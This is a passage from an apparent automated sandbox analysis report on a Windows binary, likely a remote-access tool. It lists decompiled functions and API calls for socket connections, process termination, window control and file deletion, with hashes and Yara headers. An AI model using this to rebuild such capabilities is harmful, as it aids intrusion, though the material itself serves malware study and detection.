                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                                                                • String ID:
                                                                                • API String ID: 1622488342-0
                                                                                • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                                                                • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                                                                • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                                                                • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402526, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • #23.WS2_32(00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402530
                                                                                • #4.WS2_32(00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 0040253F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                                                                  • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                                                                  • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                                                                  • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                                                                  • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                                                                  • Part of subcall function 00402440: #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024BB
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                                                                • #3.WS2_32(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 0040256A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 382206802-0
                                                                                • Opcode ID: ff0d08c1f2d9e04991a286ac1f1375558555305bcc3669552e4a5ed2cd95820b
                                                                                • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                                                                • Opcode Fuzzy Hash: ff0d08c1f2d9e04991a286ac1f1375558555305bcc3669552e4a5ed2cd95820b
                                                                                • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D817, Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E0040D817(void* __eflags) {
				char* _t8;
				void* _t25;

				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
				E004126BC( *(_t25 - 0x2c));
				E0040EBBE();
				E004017DD(_t25 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                                                                0x0040d820
                                                                                0x0040d827
                                                                                0x0040d836
                                                                                0x0040d83f
                                                                                0x0040e51b
                                                                                0x0040e6a4
                                                                                0x0040e6ac
                                                                                0x0040e6b5
                                                                                0x0040e6c1

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                                                                • atoi.MSVCRT ref: 0040D82E
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                                                                  • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                                                                  • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                                                                  • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                                                                  • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                                                                  • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                                                                  • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                                                                • String ID:
                                                                                • API String ID: 2919580351-0
                                                                                • Opcode ID: da5b9d8ba5108d0d5b7e9ed95e56d40ae97cd0c43d808eb93a2ccecde43080ad
                                                                                • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                                                                • Opcode Fuzzy Hash: da5b9d8ba5108d0d5b7e9ed95e56d40ae97cd0c43d808eb93a2ccecde43080ad
                                                                                • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412100, Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                                                                • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,000192D2), ref: 00412140
                                                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                                                                • String ID:
                                                                                • API String ID: 758954411-0
                                                                                • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                                                                • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                                                                • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                                                                • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D813, Relevance: 7.5, APIs: 5, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                                                                • atoi.MSVCRT ref: 0040E4B9
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                                                                • String ID:
                                                                                • API String ID: 4290155986-0
                                                                                • Opcode ID: e99a79710fca12779304e92261ca3e34d058ff210406a7cbc726353d7f4acda6
                                                                                • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                                                                • Opcode Fuzzy Hash: e99a79710fca12779304e92261ca3e34d058ff210406a7cbc726353d7f4acda6
                                                                                • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D80A, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                                                                • atoi.MSVCRT ref: 0040E4B9
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                                                                • String ID:
                                                                                • API String ID: 4290155986-0
                                                                                • Opcode ID: 013d18ed588bbcce2ce0616672a886baf0321ee75f897beb4599dd8eacd2935d
                                                                                • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                                                                • Opcode Fuzzy Hash: 013d18ed588bbcce2ce0616672a886baf0321ee75f897beb4599dd8eacd2935d
                                                                                • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406CFF, Relevance: 7.5, APIs: 5, Instructions: 25fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 25%
                                                                                			E00406CFF(WCHAR* __eax, void* __ecx) {
				WCHAR* _t5;
				signed int _t8;
				signed int _t9;
				void* _t15;

				_t15 = __ecx;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t5 = DeleteFileW(__eax);
				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);
				if(_t5 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					RemoveDirectoryW(_t5);
				}
				return _t9;
			}







                                                                                0x00406d01
                                                                                0x00406d06
                                                                                0x00406d0d
                                                                                0x00406d15
                                                                                0x00406d21
                                                                                0x00406d2b
                                                                                0x00406d2f
                                                                                0x00406d36
                                                                                0x00406d36
                                                                                0x00406d40

                                                                                APIs
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                                                                • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 1823182134-0
                                                                                • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                                                                • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                                                                • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                                                                • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D7E4, Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 46%
                                                                                			E0040D7E4(void* __eflags) {
				char* _t5;
				void* _t19;

				_t5 = E0040180C(_t19 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				CloseWindow(atoi(_t5));
				E004017DD(_t19 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                                                                0x0040d7e9
                                                                                0x0040d7f0
                                                                                0x0040d7ff
                                                                                0x0040e6a4
                                                                                0x0040e6ac
                                                                                0x0040e6b5
                                                                                0x0040e6c1

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7F0
                                                                                • atoi.MSVCRT ref: 0040D7F7
                                                                                • CloseWindow.USER32 ref: 0040D7FF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@CloseWindowatoi
                                                                                • String ID:
                                                                                • API String ID: 14144500-0
                                                                                • Opcode ID: 568f6e9f52c965c84b16da47c298b7d3f906b9136efd7e5a31036de184f57127
                                                                                • Instruction ID: fbc29b80efd9e4125448cee2552d84d25da0c547aa8720e2220b6587ca76b5c9
                                                                                • Opcode Fuzzy Hash: 568f6e9f52c965c84b16da47c298b7d3f906b9136efd7e5a31036de184f57127
                                                                                • Instruction Fuzzy Hash: 26E0E532910518CBDB04ABF1EC5DAEDB734FB90316B00883AE012E30E0EF785945CB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004050C0, Relevance: 7.5, APIs: 5, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                                                                • String ID:
                                                                                • API String ID: 1976170855-0
                                                                                • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                                                                • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                                                                • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                                                                • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402750, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(KeepAlive Disabled!,?,0041BE70,0041BE70), ref: 00402771
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([WARNING],?), ref: 00402785
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                                                                • String ID: KeepAlive Disabled!$[WARNING]
                                                                                • API String ID: 2944585167-3856563802
                                                                                • Opcode ID: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                                                                • Instruction ID: a30e930004435671851b5eafd83b9c9ec9f6d71b75df5e3fdd77de3efe23ec90
                                                                                • Opcode Fuzzy Hash: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                                                                • Instruction Fuzzy Hash: F3F027705103187FEB10B729C94EBEE7F8C8742354F40006AEC11532C1E6F9A9C486EA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401895, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                                                                • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                                                                • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                                                                  • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                                                                Strings
                                                                                • invalid vector<T> subscript, xrefs: 004018A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                                                                • String ID: invalid vector<T> subscript
                                                                                • API String ID: 1986322901-3016609489
                                                                                • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                                                                • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                                                                • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                                                                • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040500C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
